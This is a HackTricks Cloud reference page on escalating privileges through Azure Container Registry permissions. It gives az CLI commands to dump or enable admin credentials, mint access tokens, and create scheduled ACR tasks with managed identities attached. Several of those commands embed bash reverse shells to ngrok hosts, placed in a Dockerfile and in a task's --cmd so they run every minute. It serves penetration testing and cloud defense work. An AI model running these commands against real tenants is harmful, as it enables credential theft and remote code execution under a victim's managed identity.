🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
☁️ HackTricks Cloud / Az - Azure Container Registry Privesc

Az - Azure Container Registry Privesc

{{#include ../../../banners/hacktricks-training.md}}

Azure Container Registry

Fore more information check:

{{#ref}}
../az-services/az-container-registry.md
{{#endref}}

Microsoft.ContainerRegistry/registries/listCredentials/action

This permission allows the user to list the admin credentials of the ACR. This is useful to get full access over the registry

az rest --method POST \
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ContainerRegistry/registries/<registry-name>/listCredentials?api-version=2023-11-01-preview"

In case the admin credentials aren't enabled, you will also need the permission Microsoft.ContainerRegistry/registries/write to enable them with:

az rest --method PATCH --uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ContainerRegistry/registries/<registry-name>?api-version=2023-11-01-preview" --body '{"properties": {"adminUserEnabled": true}}'

Microsoft.ContainerRegistry/registries/tokens/write, Microsoft.ContainerRegistry/registries/generateCredentials/action, Microsoft.ContainerRegistry/registries/generateCredentials/action

These permissions allow the user to create a new token with passwords to access the registry.

To use the az clito generate it as in the following example you will also need the permissions Microsoft.ContainerRegistry/registries/read, Microsoft.ContainerRegistry/registries/scopeMaps/read, Microsoft.ContainerRegistry/registries/tokens/operationStatuses/read, Microsoft.ContainerRegistry/registries/tokens/read

az acr token create \
    --registry <registry-name> \
    --name <token-name> \
    --scope-map _repositories_admin

Microsoft.ContainerRegistry/registries/listBuildSourceUploadUrl/action, Microsoft.ContainerRegistry/registries/scheduleRun/action, Microsoft.ContainerRegistry/registries/runs/listLogSasUrl/action

These permissions allow the user to build and run an image in the registry. This can be used to execute code in the container.

⚠️ Warning
However, the image will be executed in a **sandboxed environment** and **without access to the metadata service**. This means that the container will not have access to the **instance metadata** so this isn't really useful to escalate privileges 
# Build
echo 'FROM ubuntu:latest\nRUN bash -c "bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/17585 0>&1"\nCMD ["/bin/bash", "-c", "bash -i >& /dev/tcp//2.tcp.eu.ngrok.io/17585 0>&1"]' > Dockerfile
az acr run --registry 12345TestingRegistry --cmd '$Registry/rev/shell:v1:v1' /dev/null

Microsoft.ContainerRegistry/registries/tasks/write

This is the main permission that allows to create and update a task in the registry. This can be used to execute a code inside a container with a managed identity attached to it in the container.

This is the example on how to execute a reverseh shell in a container with the system managed identity attached to it:

az acr task create \
    --registry <registry-name> \
    --name reverse-shell-task \
    --image rev/shell:v1 \
    --file ./Dockerfile \
    --context https://github.com/carlospolop/Docker-rev.git \
    --assign-identity \
    --commit-trigger-enabled false \
    --schedule "*/1 * * * *"

Another way to get a RCE from a task without using an external repository is to use the az acr task create command with the --cmd flag. This will allow you to run a command in the container. For example, you can run a reverse shell with the following command:

az acr task create \
    --registry <registry-name> \
    --name reverse-shell-task-cmd \
    --image rev/shell2:v1 \
    --cmd 'bash -c "bash -i >& /dev/tcp/4.tcp.eu.ngrok.io/15508 0>&1"' \
    --schedule "*/1 * * * *" \
    --context /dev/null \
    --commit-trigger-enabled false \
    --assign-identity
πŸ’‘ Tip
Note that to assign the system managed identity you don't need any special permission, although it must have been enabled before in the registry and assigned some permissions for it to be useful.

To assign a user managed identity also you would need the permission Microsoft.ManagedIdentity/userAssignedIdentities/assign/action to do:

az acr task create \
    --registry <registry-name> \
    --name reverse-shell-task \
    --image rev/shell:v1 \
    --file ./Dockerfile \
    --context https://github.com/carlospolop/Docker-rev.git \
    --assign-identity \[system\] "/subscriptions/<subscription-id>>/resourcegroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<mi-name>" \
    --commit-trigger-enabled false \
    --schedule "*/1 * * * *"

To update the repo of an existent task you can do:

az acr task update \
    --registry <registry-name> \
    --name reverse-shell-task \
    --context https://github.com/your-user/your-repo.git

Microsoft.ContainerRegistry/registries/importImage/action

With this permission it's possible to import an image to the azure registry, even without having the image locally. However, note that you cannot import an image with a tag that already exists in the registry.

# Push with az cli
az acr import \
  --name <registry-name> \
  --source mcr.microsoft.com/acr/connected-registry:0.8.0 # Example of a repo to import

In order to untag or delete a specific image tag from the registry you can use the following command. However, note that you will need a user or token with enough permissions to do it:

az acr repository untag \
    --name <registry-name> \
    --image <image-name>:<tag>

az acr repository delete \
    --name <registry-name> \
    --image <image-name>:<tag>

{{#include ../../../banners/hacktricks-training.md}}